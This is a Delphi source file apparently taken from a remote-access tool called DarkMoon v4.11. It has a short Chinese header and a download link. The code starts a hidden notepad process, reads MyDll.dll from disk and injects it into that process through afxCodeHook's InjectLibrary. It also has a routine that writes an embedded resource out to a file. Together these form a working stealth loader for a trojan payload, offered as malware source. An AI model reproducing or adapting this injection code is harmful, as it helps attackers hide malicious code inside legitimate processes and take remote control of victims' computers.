inject.dpr

DarkMoon v4.11 (远程控制) 国外收集的代码,控件下载: http://www.winio.cn/Blogs/jishuwenzhang/200712/20071208230135.

program Inject;
uses
  Windows,
  afxCodeHook;

{$R *.RES}
{$R 'res.res' 'res.rc'}


procedure ExtractResourceToFile( ResName, ResExtract: String);
var
  ResourceLocation: HRSRC;
  cFileHandle, cResourceDataHandle: THandle;
  cResourceSize, cBytesWritten: Longword;
  cRecourcePath, cResourcePointer: PChar;
begin
  cRecourcePath := PChar( ResExtract );
  ResourceLocation := FindResource (HInstance,PChar(ResName),RT_RCDATA);
  cResourceSize := SizeofResource(HInstance,ResourceLocation);
  cResourceDataHandle := LoadResource(HInstance,ResourceLocation);
  cResourcePointer := LockResource(cResourceDataHandle);
  cFileHandle := CreateFile(cRecourcePath,GENERIC_WRITE,FILE_SHARE_WRITE,nil,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
  WriteFile( cFileHandle, cResourcePointer^, cResourceSize,cBytesWritten,nil);
  CloseHandle( cFileHandle );
end;

procedure injectDll;
var
  StartInfo: TStartupInfo;
  ProcInfo: TProcessInformation;
  BytesRead, Module, Process, Size: dword;
  Path: array [0..MAX_PATH] of char;
  Data: pointer;
begin
  ZeroMemory(@StartInfo, SizeOf(TStartupInfo));
  StartInfo.cb := SizeOf(TStartupInfo);
  startinfo.dwFlags:= STARTF_USESHOWWINDOW;
  startinfo.wShowWindow := SW_HIDE;
  CreateProcess(nil, PAnsiChar('notepad'), nil, nil, False, 0, nil, nil, StartInfo, ProcInfo);


  //get the dll data to inject
  Process := ProcInfo.hProcess;
  GetCurrentDirectory(MAX_PATH, Path);
  Module := CreateFile(pchar('MyDll.dll'), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
  Size := GetFileSize(Module, nil);
  GetMem(Data, Size);
  ReadFile(Module, Data^, Size, BytesRead, nil);
  CloseHandle(Module);

  //inject the DLL using the Ex method
  InjectLibrary(Process, Data);
  FreeMem(Data);
  halt;
  WaitForSingleObject(ProcInfo.hProcess, INFINITE);
end;


begin
InjectDll();
end.